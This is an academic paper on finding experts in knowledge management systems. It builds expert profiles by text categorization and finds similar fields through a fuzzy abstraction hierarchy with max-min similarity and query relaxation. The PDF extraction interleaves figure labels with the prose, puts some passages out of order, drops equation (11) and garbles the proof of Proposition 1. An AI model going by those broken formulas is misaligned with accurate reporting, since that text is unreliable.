INTRODUCTION Managing tacit knowledge, which is usually embedded in the operating procedures as routines or standards in the organizations, has been considered as important as or even more important than managing its counterpart, explicit knowledge, to stay competitive in the business world (Hansen, Nohria, & Tierney, 1999; Kakabadse, Kouzmin & Kakabadse, 2001; King, 2006; Nonaka & Takeuchi, 1995). Therefore, the need for the effective management of tacit knowledge has been taking up much of the research time and effort by knowledge management system (KMS) researchers and practitioners (Kwan & Cheung, 2006; Liebowitz, 2001; Nah, Siau & Tian, 2005; Rus & Lindvall, 2002; Siau, 2000; Zack, 1999). However, the results of the research effort to develop an effective and efficient way to store, retrieve, and share tacit knowledge has not been successful enough to be widely accepted in practice due to its limited applicability and inflexibility. Examples of the research in this direction include best practice systems in which organizational best practices are stored in the database for later uses (O’Dell & Grayson, 1998; Sorensen & Snis, 2001). In addition, design rationale systems can be another example, through which design rationale is represented and maintained (Buckingham-Shum & Hammond, 1994; Conklin & Yakemovic, 1991; Hu, Pang, Pang, Atwood, Sun, & Regli, 2000). However, since the former requires context-specific knowledge for someone to fully take advantage, it has not been actively utilized in a real business environment. Also, due to its limited applicability and domain dependency, a single design rationale system cannot be used across many different fields. In the meantime, other research in manipulating tacit knowledge proposes providing appropriate ways to search for individual experts in the organizations rather than deliberately codifying their knowledge (Alavi & Leidner, 2001; Desouza, 2003). This search approach for experts can be applied to almost any
756
domain due to its generality while avoiding the possible degradation of the knowledge resulted from the deliberate separation of it from the holders (Augier & Vendelo, 1999; Desouza, 2003; Kreiner, 2002). Following this type of research, some of commercial KM tools started to include search functionality for experts in their suites (Handysoft, 2003; Microsoft, 2004; Verity, 2004). To enable the search functionality for experts, the experts themselves in the organization should be identified in terms of the type of expertise they possess. There can be two approaches for compiling this expertise information. One is a manual registration approach which requires the system administrator or the expert to put the expertise information into the system. The other is to automate the expert profiling process based on the knowledge activities of each expert in KMS. Most of commercial KM products with search functionality for experts adopt the former approach which requires constant human intervention to keep expert profile information current. The maintenance cost of profile information is not the only disadvantage of this approach. Other shortcomings of manual profiling include (1) the difficulty of reflecting the changes in each subject field such as new concepts or terminology that continue to evolve, (2) the difficulty of maintaining objectivity and consistency in classifying experts or measuring the level of expertise by people involving the classifying task, either the experts themselves or system administrators, and (3) the lack of expertise in classifying all the experts in many different subject fields if the classifying task is done by one person. Considering all those limitations of the manual profiling approach, it is needed to have an efficient as well as automatic way to build and maintain those expert profiles using an objective classifying methodology. Analyzing the knowledge artifacts registered by experts such as uploaded documents or posted articles on bulletin boards and classifying those artifacts into predefined subject fields are the most feasible ways to automate the expert profiling
Intelligent Search for Experts Using Fuzzy Abstraction Hierarchy in Knowledge Management Systems
process. This is because the registered knowledge artifacts can be considered to represent the expertise of the users registering them to a certain extent and also because from a system’s point of view, they are the only contents available for classification, which result from the interaction between KMS and its users. Since most of registered knowledge artifacts have textual forms such as plain text or document files, a text categorization technique is the most appropriate solution for classifying them without any manual human intervention (Baeza-Yates & Riberio-Neto, 1999; Belkin & Croft, 1992; Gentili, Marinilli, Micarelli, & Sciarrone, 2001; Ko, Park & Seo, 2004; Kwon & Lee, 2003; Lam, Ruiz & Srinivasan, 1999; Lertnattee & Theeramunkong, 2004; Ruiz & Srinivasan, 2002; Tokunaga & Iwayama, 1994). Therefore in this article, we apply a text categorization technique to classify knowledge artifacts registered by KMS users in building their profiles. Once the expert profiling process is completed and all the expert profiles are consolidated into the expert profile database, it is possible for users to perform searches for experts using the search mechanisms provided by the system. However, conventional query processing can only provide exact answers to a user’s queries if and only if all the conditions of the queries are satisfied. Therefore, using the conventional query processing approach, the system cannot provide any useful information if there are not any experts with specific knowledge in need. To avoid this exact matching requirement of conventional query system and increase the user’s search satisfaction, several approaches are researched and proposed, such as nearest neighbor searches (Chan, 1998; Dang, Kung & Wagner, 2002) and preference searches (Chomicki, 2004; Klein & Konig-Ries, 2004). While nearest neighbor searches deal with mostly numeric conditions to provide best matches, preference searches provide a generic way to express concepts like importance or relevance. Similar to the preference search
approach, there are cooperative query answering mechanisms (Braga, Laender & Ramos, 2000; Cai, Cercone & Han, 1993; Huh & Lee, 2001; Huh, Moon & Lee, 2000), which were developed to give flexible query results through interactions with users based on predefined conceptual relationship among domain knowledge. To increase the user’s satisfaction in performing searches for experts by providing experts in similar or related subject fields, who might be the best candidates available to provide solutions for problems on hand, we utilize a cooperative query answering approach equipped with a hierarchical knowledge representation scheme. The subject fields of experts, in which each expert has specialized expertise or knowledge, can be represented as a hierarchical structure since more specific or detailed subject fields can be grouped into more generalized or higher level subject concepts. This hierarchical structure of knowledge or subject fields is appropriate to be utilized to classify experts systematically according to the expertise they have. In this article, we adopt Fuzzy Abstraction Hierarchy (FAH) (Moon & Huh, 2003), which incorporates fuzzy relations and operations to calculate similarity measures among data values as well as provides cooperative query answering capabilities. By adopting FAH, KMS users can be given an ordered list of approximate expert candidates to their search queries for experts based on the similarity measures calculated using fuzzy relations. This article is organized as follows: In the second section, the FAH framework is briefly introduced. The third section describes the structure of expertise we define in this article to show how to measure each expert’s level of expertise in a certain subject field and explains the training process of the automatic expert classifier, through which initial similarity measures for FAH are derived. The fourth section introduces the intelligent search process for experts based on FAH providing flexible search results according to the user’s preferences. Also, the prototype system we
757
Intelligent Search for Experts Using Fuzzy Abstraction Hierarchy in Knowledge Management Systems
implemented to test the practicality of the proposed framework is presented in this section. Finally, the fifth section concludes the article.
FUZZY ABSTRACTION HIERARCHY The ultimate purpose of automating expert profiling and providing a search mechanism for needed experts is to return satisfactory answers to a KMS user’s queries for experts he or she wants. When the user’s query does not return sufficient answers using the exact match mechanism, providing approximate answers with similar characteristics is one way to improve user satisfaction on the search results in addition to finding the exact matches to the search criteria. In this capacity, when a specific KMS system does not have expert profiles with specific expertise that a user wants to find or the query result is not satisfactory enough, more search satisfaction can be achieved if the system is able to provide an additional search capability to find experts with similar or related expertise by improving the query processor of the system. To facilitate searches for similar experts, we adopt FAH in this article. FAH is a type of ontology in a sense that it is a hierarchically structured set of terms for describing a domain. Ontologies have been actively researched and proposed as an important knowledge representation framework (Corcho, Fernandez-Lopez & Gomez-Perez, 2003; Jurisica, Mylopoulos & Yu, 2004; Sugumaran & Storey, 2002). FAH, however, can be distinguished from a general ontology because not only does it represents semantic distances among concepts using fuzzy numbers, but also it is equipped with the intelligent query processing capability to provide approximate answers to user queries. FAH has been developed to remedy the shortcomings of conventional query processing that does not possess any intelligence to cooperate with users in providing flexible query results according
758
to the user’s needs unless complex and strict query language syntax is followed. It analyzes the intent of a query and transforms it into a new query of either wider scope by relaxing the original query conditions or narrower scope by tightening them. FAH has a couple of advantages over other data abstraction methods in applying to searches for experts. First, since FAH represents the semantic relationships among data values based on data abstraction as a hierarchy, it is the most appropriate and applicable representation framework for expert categorization. This is because expertise has its own hierarchical structure due to its categorical trait. Second, based on the mechanism proposed in FAH, we can calculate and represent the exact level of similarity among values, through which other valuable information such as fitness scores or similarity measures between search results can be given. Figure 1 shows an example of FAH defined for research fields and the following definitions are needed to understand its hierarchical structure. First, the abstract field is called n-level abstract of a specific field according to the difference (n) between the abstraction levels of the two fields. Second, among the fields existing on the same abstraction level, n-level siblings are composed of fields whose nearest same abstract field is an n-level abstract one. Figure 1 illustrates the conceptual relationships defined above among subject fields. In the figure, it is shown that “Natural Science” is a 1-level abstract field of the three fields of “Mathematics,” “Physics,” and “Physical Chemistry.” By the same token, “Engineering” is a 1-level abstract field of “Computer Science” and “Mechanical Engineering.” Also, there exists a 1-level sibling relationship between “Mathematics” and “Physics” because both fields share the same 1-level abstract field of “Natural Science.” In this capacity, “Physical Chemistry” and “Computer Science” are 2-level siblings since a 2-level abstract field is the nearest same abstract field that both fields have. In ad-
Intelligent Search for Experts Using Fuzzy Abstraction Hierarchy in Knowledge Management Systems
Figure 1. Example of fuzzy abstraction hierarchy Abstraction level 2-level abstraction
Research Field
Level 3 0.6
Level 2 0.5
Level 1
Mathematics
Natural Science
Physics
0.6
Engineering
Physical Chemistry
Computer Science
0.8
1-level siblings
dition, the number given for each 1-level sibling pair is the similarity measure assigned for those siblings. Providing a wider range of approximate answers by relaxing search conditions requires an expert’s knowledge of the underlying data semantics; for example, similarity measures among data values. Thus, a system administrator or an experienced expert should evaluate, determine, and finally assign the values for the initial similarity measure among sibling nodes sharing the first-level parents as shown in Figure 1. Also, constant maintenance effort is required whenever needs for updating those similarity measures arise. This type of manual assignment of similarity measures is the major limitation of FAH and has the following problems. First, the similarity values assigned for pairs of fields in the hierarchy are fully dependent on the person who performs evaluation and value assignment and, therefore, the values are rather subjective. Second, it is not possible for one individual to assign all the similarity measures correctly if the hierarchy is large, resulting in the large number
1-level abstraction
Mechanical Engineering 0.8
2-level siblings
of data pairs requiring initial value assignment because, most of time, one person cannot be knowledgeable about all the defined fields in the hierarchy. Third, subject fields themselves keep changing. In other words, as time goes by, the similarity measure between two fields can be different from what it was before due to many reasons. Whenever this kind of update requirement arises, human intervention, which costs time and money, should be involved if the manual assignment process is adopted. Considering these limitations, there is enough room for developing a more efficient as well as more cost-effective similarity value evaluation and assignment methodology. Thus, an automatic method of assessing the similarity measures is needed for effective knowledge maintenance. A text categorization approach can be applied to automatically derive the similarity measures among the subject fields by analyzing knowledge contents belonging to each subject field, which is explained later in the automatic expert classifier training section.
759
Intelligent Search for Experts Using Fuzzy Abstraction Hierarchy in Knowledge Management Systems
BUILDING AN EXPERT PROFILE DATABASE In this section, we explain the structure of the expertise we define in this article and introduce how to train the automatic expert classifier, through which initial similarity measures among subject fields are derived.
Structure of an Expert Profile Enabling the search capability for experts requires building an expert profile database, which provides the detailed information of the expertise individual experts possess. In this article, we define an expert profile as a collection of information showing the types of expertise and the levels of expertise in each subject field, which a certain expert possesses. An expert might possess expertise in more than one subject field and one’s expertise might change over time due to the changes in interests or the subject field itself. Therefore, a constant and systematic update for expert profiles is needed to keep the profile information useful and current. In this sense, an automatic expert profiling mechanism has advantages over the manual profiling process. To build an expert profile database, we assume that expertise can be measured based on the following factors: (1) activeness, (2) relevance, and (3) usefulness. Activeness means how frequently an expert performs knowledge creation activities by registering knowledge artifacts into the system. In more detail, activeness can be decomposed into recency, frequency, and volume. Recency should be taken into account to evaluate a knowledge artifact since its value can change due to the fact that most of the knowledge registered into KMS becomes obsolete over time in general. Therefore, a knowledge artifact should be adjusted by the time factor determining its value. Frequency is actualized by the number of knowledge artifacts contributed by a certain expert. The more knowledge an expert registers, the more expertise we
760
can think he or she has. Finally, the volume factor is adopted to acknowledge experts who provide knowledge artifacts in large volumes. Generally speaking, a knowledge artifact in large volume can convey more information and the system at least should acknowledge the time and effort of registering such lengthy knowledge artifacts. The following formula shows the activeness measure of expertise explained above.
∑
n i =1
wrj (Ti ) * wvj (Vi )
(1)
where, Ti and Vi denote the time factor of knowledge artifact i, in which it is registered, and its volume factor respectively. For example, the number of days passed or the time elapsed from a specific point in time since a certain knowledge artifact is registered can be used for Ti, and the number of words can be substituted for Vi. Also, note that wrj is the weight of the recency factor in field j, and wvj is the weight of the volume factor in field j. Since different subject fields may have a different total base of knowledge artifacts registered on the knowledge base, which gives different standards such as the frequency and the average volume of knowledge artifacts to calculate the recency and volume factors of the newly registered knowledge artifact, weights for those two factors should be adopted to adjust the differences among subject fields. For example, let us think that there are subject fields called “EC” and “Mainframe” respectively in IT category. In this case, it is highly probable that new knowledge artifacts concerning “EC” will be registered more frequently with higher volume than those of “Mainframe” these days. The frequency factor can be automatically accumulated when the summation of all other factors is obtained since every knowledge artifact would be influenced by this activeness calculation. Therefore, the more knowledge artifacts an expert registers, the more knowledgeable in that subject field we can think he or she is. For a certain expert, the total summation of all the
Intelligent Search for Experts Using Fuzzy Abstraction Hierarchy in Knowledge Management Systems
calculated values from this formula represents the level of activeness of the expert in a certain subject field. The second component of expertise, relevance, means how close a knowledge artifact is to a specific subject field. If it is possible to evaluate a registered knowledge artifact to find out which field it belongs to and how well it fits into the field, we can utilize this factor to determine the relevance of the expert having registered the knowledge artifact in the specific subject field. The relevance can be obtained as shown in the following formula (2).
Ak denotes the usefulness point given by user k about document i. Since a knowledge artifact can be utilized and evaluated by more than one user, all the usefulness factors from the users of document i, Di, should be accumulated, and all the usefulness factors for a certain expert can be gained by summing up all the usefulness factors of every knowledge artifact registered by that expert as shown in formula (3).
∑
To enable classifying registered knowledge artifacts automatically as well as derive initial similarity measures among subject fields, the automatic expert classifier should be trained using training documents. In this section, we explain how to train the automatic expert classifier based on a text categorization technique using Vector Space Model (Baeza-Yates & Riberio-Neto, 1999; Lee, Chuang & Seamons, 1997; Salton & Lesk, 1968; Salton & Yang, 1973). There have been active studies on measuring similarities among documents and many different techniques such as latent semantic indexing (LSI) (Furnas, Deerwester, Dumais, Landauer, Harshman, & Streeter, 1988), Bayesian Probabilistic Model (Turtle & Croft, 1991), and vector space model (VSM) have been proposed. Among those text representation models, VSM has been chosen in this article to train the classifier and measure similarity values among subject fields since it shows the optimal performance in many research results (Baeza-Yates & Riberio-Neto, 1999). We propose three steps to train the automatic expert classifier. During the training process, initial similarity measures among subject fields sharing the same parent nodes on the subject field hierarchy are calculated and assigned, which will be used in fuzzy logic calculations to come up with the similarities for any possible pair of two subject fields in the hierarchy. The following subsections will elaborate the three steps in more
n i =1
Sj ( Di )
(2)
where, Di is a document or knowledge artifact i, and Sj is the relevance score of a certain artifact for field j. The relevance score, Sj, is measured by the automatic expert classifier, which is trained through machine learning beforehand using training documents. Actually, the expert classifier returns the complete list of fitness scores, from the highest to the lowest, along with all the subject fields defined in the subject field hierarchy. The highest fitness score, which tells how close the knowledge artifact is to a specific field, is used for the relevance score in this case. For the simplicity of calculation, only the highest relevance score is used. However, if we expand to take multidisciplinary knowledge, which is popular in contemporary research community, two or three scores from the list can be used. The usefulness factor is also important to determine the value of the registered knowledge artifact. Even though very distinguished knowledge is registered on the system, it is not useful or meaningful unless other users make use of it and find it so. Therefore, the addition of other users’ evaluation for the registered knowledge in the expertise measuring process is reasonable. The usefulness factor can be represented as follows:
∑ ∑ n
m
i =1
k =1
Ak ( Di )
(3)
Training Process of Automatic Expert Classifier
761
Intelligent Search for Experts Using Fuzzy Abstraction Hierarchy in Knowledge Management Systems
Figure 2. Training of automatic expert classifier
STEP 2
STEP 1 Subject Field Hierarchy
STEP 3 F 1Vector= {(Calculus, 39/39*log(5/4)), ..., (Pressure, 1/39*log(5/4))} ... F 5 Vector= {(Calculus, 9/33*log(5/4)), ..., (Pressure, 33/33*log(5/4))}
Training Documents Training D1Vector= {(Calculus, 12), (Dimension, 2), ..., (Pressure, 0)} D2Vector= {(Calculus, 11), (Dimension, 7), ..., (Pressure, 0)}
D Vector= {(Calculus, 4), (Dimension, 0), 15 ..., (Pressure, 18)}
detail. Figure 2 depicts the training process of the automatic expert classifier, which involves Step 1 through 3 explained in this section, along with the expert profiling procedure using the trained classifier.
Step 1: Preparing Taining Documents Documents for training the automatic expert classifier should be prepared with preassigned subject fields. In order to ensure the effectiveness of the training documents, two assumptions are needed. First, each training document is assigned a correct subject field. Second, the set of training documents belonging to a specific subject field wholly represent the field itself with terms used in the documents. Once those assumptions are made, meaningful terms can be extracted from training documents to build a vector space for each subject field, which later is used to classify
762
Expert Field Assignment
Document
Knowledge Creation & Application
the newly registered knowledge artifacts in the form of documents.
Step 2: Building a Subject Field Vector for Each Subject Field A subject field vector describes the list of all the meaningful terms extracted from a certain subject field’s aggregate document and the relative importance of each term in representing the subject field. In this step of the training process, the field vector (FVj) for each subject field is assembled from the aggregate document (ADj) of each field. To build subject field vectors out of training documents, the following concepts are used. First, a term set (TS) is a collection of meaningful terms extracted from the entire training documents to represent their contents, eliminate grammatical constructs such as articles, conjunctions, and so
Intelligent Search for Experts Using Fuzzy Abstraction Hierarchy in Knowledge Management Systems
forth. Let us consider that there are a total of 15 documents consisting of five meaningful terms as illustrated in Figure 3. In this case, the term set for this document collection would be TS = {Calculus, Dimension, Algorithm, Software, Pressure}, and pairs of each term and its frequency in each document are compiled as term vector spaces for needed calculations. Second, an aggregate document (ADj) is the concatenation of all the meaningful terms compiled from documents as shown with DSj (Document Set) = {Dj1, Dj2, …, Djd}, which belong to a specific subject field ( j) where j = 1, …, N. N is the total number of fields defined and j is the index of the subject field. Also, d denotes the number of documents belonging to subject field j. In other words, an aggregate document contains all the occurrences of meaningful terms belonging to the specific subject field concerned. As an example in Figure 3, there are five subject fields named Mathematics, Physics, Physical Chemistry, Computer Science, and Mechanical Engineering, each of which contains three documents respectively. In this case, the document set DSMathematics aggregates documents D11, D12, and D13, and formulates the aggregate document ADMathematics. By the same token, DSPhysics aggregatesD21, D22, and D23 formulates ADPhysics. FVj (field vector for subject field j) is composed of terms belonging to the term set and the explana-
tory level of those terms in a specific field. The formulas for formulating FVj are as follows. FVj = {(t1, wj1), (t2, wj2), …, (tp, wjp)}
(4)
where p denotes the total number of index terms, and the explanatory level of term tp for ADj (field j), wjp, can be obtained by wjp = tf jp × idfp
(5)
tf jp = freq jp / maxl( freq jl)
(6)
idfp = log(N/np)
(7)
We can gain the comparative importance of term tp (wjp) in ADj (field j) from the product of tf jp and idfp as shown in (5). tf jp in (6) can be calculated by the raw frequency of a specific term (tp) in field j, which is denoted by freq jp, divided by maxl ( freq jl) that is the maximum number of occurrences of a single term being mentioned in the aggregate document concerned or field j. N is the total number of aggregate documents and np is the number of documents in which the concerned index term appears. While term frequency (tf jp) concerns the occurrence of a certain term within a document, inverse document frequency (idfp) concerns the term’s occurrence across a collection of documents. It means that terms which rarely
Figure 3. Vector space formulation Research Field Natural Science Mathematics
Intelligent Search for Experts Using Fuzzy Abstraction Hierarchy in Knowledge Management Systems
appear over a collection of documents are more meaningful and important in distinguishing a certain document including the terms from other documents without them. Therefore, idfp in (7) is the inverse document frequency of term tp and its importance is inversely proportional to the number of documents containing tp denoted by np. Let us take Figure 3 as an example. In this example, we assume that there are the frequencies of each term in the aggregate documents ADj of five fields as shown in Table 1. From Table 1, the field vectors can be derived for five different fields. The explanatory level of each term belonging to the term set, TS, can be calculated to show
how much each term explains the specific field or how well it represents the field concerned. For example, the following shows the explanatory level calculations for “Mathematics” and “Physics” as well as assembling of field vectors (FV) for those subject fields. Table 2 shows the result of all the field vector calculations for the example used in this section.
Step 3: Calculating the Initial Similarity Measures Among Subject Fields Before the searching capability for experts in similar or related fields using FAH is enabled, the
initial similarity measures among subject fields should be calculated and assigned. Since the aggregate document vectors derived from previous steps contain the vectors of each term’s explanatory level for each subject field, it is possible to calculate the similarity level among specific pairs of subject fields if the Cosine Similarity Function method applies (Baeza-Yates & Riberio-Neto, 1999). Generally, the similarity between two vectors can be represented as cosθ calculated from the two vectors, and the following equation (8) shows mathematical representation of this similarity function. sim( FV1 , FV2 ) = cos =
FV1 ⋅ FV2 FV1 × FV2
(8)
FV1⋅FV2 denotes the inner product of two vectors, FV1 and FV2, and FV1 represents the norm of vector FV1. Calculated field similarity values are combined to build FAH based on generalization and abstraction relationships. In addition, to be able to use derived similarity values among subject fields as similarity measures in FAH, those values should be within the range of 0 and 1 following the definitions of FAH. Since the similarity measure between two vectors is derived from the value of
calculated cosθ between the two vectors, the value domain condition is satisfied due to the fact that cosine value is always between 0 and 1. Once the automatic expert classifier is trained, it is utilized to build an expert profile database by analyzing the knowledge artifacts contributed by each expert. The expert profile structure explained in the previous section is used to measure the overall expertise level of each expert. The composition scheme for three factors, which are activeness, relevance, and usefulness, is dependent upon the organization employing the proposed framework. For example, the simple summation of three factors with different weights can be used to combine three calculated factors. In addition, the routine update of the expert profile database as well as the retraining of the automatic expert classifier is required to accommodate the changes that occur to the subject fields and the registered experts themselves.
INTELLIGENT SEARCH FOR EXPERTS USING FAH In this section, we explain how to adopt FAH in enabling searches for experts in similar fields and
765
Intelligent Search for Experts Using Fuzzy Abstraction Hierarchy in Knowledge Management Systems
introduce a prototype system we built in applying the expert management framework we propose in this article.
Applicability of FAH To exploit tacit knowledge of experts in KMS, providing an effective and efficient way to pinpoint the experts with specific expertise matching users’ information needs as well as properly compiling expert profiles is important. This enables users to reach needed experts for their knowledge. In searching for needed experts, the system might not return satisfactory results for users’ queries all the time due to various reasons such as the limited expert pool or the lack of experts in certain fields. In case of not finding exact matches to users’ queries, it might increase the satisfaction level of the users if the system can provide experts in similar or related fields instead since those with similar expertise might be at least the optimal options available within the organization concerned. In addition to finding experts in similar or related fields, it is also helpful to enable users to know how much searched experts meet the search criteria by providing fitness scores to subject fields or ranking among search results. Combining FAH with a text categorization method, two kinds of useful information can be provided additionally for users. One is similarity measures among subject fields calculated from the field hierarchy using FAH’s fuzzy logic for determining who possess expertise in similar or related fields. The other is the fitness score of each expert in the selected field showing how much expertise each expert possesses for that specific field. Providing both similarity measures among fields and the fitness score of each expert in each field can help KMS users find needed experts more effectively.
766
Similarity Measure Calculation Using Max-Min Operator In this section, we show the similarity measure calculation process for subject fields that are far from each other on the defined subject field hierarchy using max-min operator in fuzzy logic (Zadeh, 1973). The calculation uses the initial similarity measures derived from the classifier training session among two subject fields sharing the same upper level parent node. Since the initial similarity measures among subject fields are represented as fuzzy numbers in FAH, we use max-min composition, which is the most popular composition method for fuzzy numbers, for the similarity measure calculation (Dubois & Prade, 1980). FAH considerably reduces creation and maintenance costs for a hierarchy by decreasing the number of similarity measures to be explicitly assigned. In other words, only similarity measures for sibling nodes sharing parents need to be assigned leaving other measures to be calculated using max-min composition operation. Based on the multilevel abstraction concepts of FAH, the similarity measure between n-level siblings should monotonically decrease as the abstraction level (sibling level) n increases. For example, similarity measures among 2-level sibling fields cannot be greater than those among 1-level siblings and smaller than those among 3-level siblings. This monotonic property of a decreasing similarity measure with respect to the abstraction level can be summarized as the following proposition.
Proposition 1: Monotonically Decreasing Similarity The similarity measure between (n+1)-level sibling fields should not be greater than those between n-level sibling fields, where n>=1. Meanwhile, to reduce the number of sibling pairs requiring initial similarity measure assign-
Intelligent Search for Experts Using Fuzzy Abstraction Hierarchy in Knowledge Management Systems
ment, the similarity values among n-level sibling fields (n>=2), for which similarity measures are not assigned explicitly, are calculated using the max-min composition operator of fuzzy relations while the similarity measures among 1level sibling fields are derived from Vector Space Model explained previously. As an example, the similarity measure between “Mathematics” and “Computer Science” in Figure 1 can be calculated if initial similarity measures among 1-level sibling fields are given. As explained previously, similarity measures among 1-level sibling fields are derived through the training process of the automatic expert classifier. It is possible to assign all the field similarity measures regardless of the level of their relationships using the same procedure for 1-level similarity derivation. However, this approach has the following shortcomings: (1) it requires heavy calculations depending on the size of the subject field hierarchy since it considers all the possible pairs of siblings and calculates the desirable values for them; and (2) the calculation results cannot always guarantee Proposition 1, meaning that sometimes the calculated similarity measures among 2-level sibling fields might be greater than those for 1-level sibling fields due to the possible consequences of exceptional training documents in certain fields, which is against Proposition 1. Therefore, we derive similarity measures only for 1-level sibling fields using training documents
during the training process and calculate higher level similarity measures based on max-min operation while satisfying Proposition 1. Figure 4 shows the process of similarity measure calculation among 2-level siblings using maxmin operation with a simplified example of FAH. In the figure, rectangles represent subject fields and solid lines depict the hierarchical structure among subjects such as p1 being the parent for a1 and a2. Also, a thick line shows the feasible path to connect two subject fields along with the hierarchical structure on FAH. Numbers along with dotted arrows represent the similarity measures among two fields connected by the arrow. For the links on each path, the min operation is used to compute the similarity measure for the entire path and if there are multiple paths between two fields, then the max operation is used for the path with the largest similarity measure. Let us calculate the similarity measure between a1 and b3 from the figure. Here, a1 and b3 are subject fields belonging to higher level fields, p1 and p2, respectively and their parent nodes, p1 and p2, share the same parent node though not shown in the figure, making a1 and b3 2-level siblings. The result of fuzzy relation composition using maxmin operation for a1 and b3 is as follows. (Derived) sim(a1, b3) = Max [Min [sim(a1, p1), sim(p1, p2), sim(p2, b3)]] (9)
Figure 4. Similarity measure calculation using max-min operation Feasible path
0.4
p1
p2 1
1 a1
a2
b1
b2
b3
p1
a1 1
p2 0.4
b3 1 Max-Min Operation
0.4 0.7
0.3
0.5
Final Similarity Measure
767
Intelligent Search for Experts Using Fuzzy Abstraction Hierarchy in Knowledge Management Systems
As illustrated in Figure 4, FAH has the hierarchical structure in which one child has only one parent. Consequently, from a1 to b3, there exists only one feasible path, which is a1 → p1 → p2 → b3. If we assume that the similarity measure between a parent and a child is always 1 uniformly, equation (9) can be transformed into the following. (Derived) sim(a1, b3) = Min [sim(a1, p1), sim(p1, p2), sim(p2, b3)] (10) = Min [1, sim(p1, p2), 1] = sim(p1, p2) = 0.4
from the automatic expert classifier in case of 1-level siblings, we can guarantee that the final similarity measure between two fields gets smaller accordingly as the level difference gets larger. In addition, we normalize the calculated similarity measure to have a value between 0 and 1 by dividing it by the maximum level difference. The proof that (Extended) sim satisfies the proposition 1 is as follows. Proof of Proposition 1 Let a and b be (Derived) sim between n-level siblings and (n+1)-level siblings respectively. If Max(level difference) is M and (Extended) sim of a and b are Ea and Eb, E − E = M −Mn + a − M − (nM+ 1) + b = M − n + a − M + n + 1 − b a − b + 1. Because 0 ≤ a ≤ 1, 0 ≤ b ≤ = M M 1, and M > 0, –1 ≤ a – b ≤ 1 and 0 ≤ a – b + 1 ≤ 2. Therefore, a − b + 1 ≥ 0 and Ea ≥ Eb. M The final similarity measure between a1 and b3 in the example is sim(a1, b3) = {(2-2)+0.4}/2 = 0.2. The final similarity measure derived from the above mentioned calculating process is used to get the list of experts, who are appropriate for a user’s search criterion, to use FAH operations. We elaborate on the detailed search process for experts in the following section. a
We can see that by fixing the similarity measure between the parent and the child as 1, the derived similarity measure between a1 and b3 is the same as the similarity measure among their parents, p1 and p2. Meanwhile, it should be noticed that (Derived) sim(a1, b3), and 0.4, resulted from equation (10) is greater than sim(b1, b2), and 0.3, which does not satisfy Proposition 1. To remedy this anomaly, we define the extended similarity as in equation (11) including the concept of sibling level formulated from the abstraction level in the hierarchy.
Search Process for Experts in Similar Subject Fields
(11) where level difference among n-level siblings is n and Max(level difference) is the largest possible sibling level between two subject fields existed in the hierarchy. Both of them are 2 in this example. Equation (11) shows that the final similarity measure, extended similarity, is calculated from the derived similarity incorporating the level difference to satisfy the monotonically decreasing similarity constraint. By adding “Max(level difference)–level difference” to the derived similarity, or just the similarity measure derived
768
b
Once the expert profiling process is completed so that experts are assigned to individual subject fields and similarity measures among the subject fields are determined, it is possible for users to search for experts that they need as well as the other experts in similar or related fields. More precisely, when no experts are found in a specific field as requested in a user’s query, the search capability for similar field experts can provide useful alternate results in a certain level in the sense that those experts with similar expertise are the best candidates available within the organization for the user. Moreover, when returning
Intelligent Search for Experts Using Fuzzy Abstraction Hierarchy in Knowledge Management Systems
the search results, it is ideal to list the candidate experts in the order of similarity level to the user’s requested expertise. This additional intelligence is specifically possible using the similarity measures among subject fields based on FAH. Figure 5 shows the general process of a search for experts proposed in this article using UML’s activity diagram. An activity diagram is a useful tool to depict sequencing of activities, each of which represents a state of doing something (Booch, Rumbaugh & Jacobson, 1999). Simply, an oval represents an activity and an arrowed line shows the sequence from one activity to another. Using a diamond-shaped figure, we can show a conditional branch. A search for experts starts with a user’s keyword input, which the system uses to find matches in the field names from the subject field hierarchy. Field name matching starts with the lowest level in the hierarchy. If no matches are found,
the search moves to target the next higher level for keyword matching. From the lowest level to the top, if a field name in the hierarchy is found, the expert list for that field is compiled from the expert profile database. There is one more step involved before proceeding to FAH operations, which provide the search capabilities for similar field experts. If there are not any matches even though searching is completed all the way to the top level of the field hierarchy, a search thesaurus participates in the process. We adopt this thesaurus approach because it can remedy possible problems that result from typos or synonyms, which are very likely to happen while entering a keyword. For example, let us say there is a subject field called “Electronic Commerce” in the hierarchy. In this case, if a user types “EC” instead, the system would not return any expert lists unless it uses other mechanisms in addition to word-for-word matching. The search thesaurus plays an impor-
Figure 5. Activity diagram of search for experts FAH Engine
User
Query Processor
Thesaurus
Enter Search Keyword
Field Search Search Expert Field
[else] Move Higher Level
[found match]
[else]
Search Thesaurus
[found match] Correct Search Keyword
Search Expert Profile
[found match] Perform FAH Operation
[else]
[satisfied]
Display Expert List
[else] Display Message
769
Intelligent Search for Experts Using Fuzzy Abstraction Hierarchy in Knowledge Management Systems
tant role in changing the input keyword “EC” to “Electronic Commerce” so that the system can perform the rest of the search function. By the same token, the search thesaurus can be used to correct a wrong input keyword in case of typos. If the list of experts compiled as the search result is not satisfactory enough, FAH operations, either by query relaxation or query tightening, can be performed. More precisely, when there are too many experts being listed, query tightening can be applied to tighten search conditions by reducing the search space with a more specific field name chosen from the field name list given by the system. On the contrary, in case of too few search results, query relaxation can provide a larger group of experts by including experts in similar fields. To demonstrate and explain the search process for experts through FAH operations introduced in Figure 5, we use a simplified expert profile database that is defined as the following database table: EXPERT {(id, name, field, level)}. Figure 6 illustrates the intelligent search process for experts based on the expert profile database defined here. For example, if a user wants to find out who the experts are in “Math” or similar fields, the query would be written as “SELECT NAME, FIELD FROM EXPERT WHERE FIELD =? ‘Math’” using the user’s input keyword. In the original query, query relaxation is specified by the relaxation operator “=?” upon the user’s request. If we use the field hierarchy defined in Figure 1, the result of this original query is null because “Math” does not exist as a subject field in the hierarchy. In this case, “Math” will be replaced with “Mathematics” that can be retrieved from “Search Thesaurus” as shown in Figure 5. Since query relaxation is requested by the user, the generalized query is made as “SELECT NAME, FIELD FROM EXPERT WHERE FIELD is-a Generalize(‘Mathematics’, 1)” by finding the 1level abstract field of “Mathematics.” An additional query language construct, is-a, indicates the generalization relationship between
770
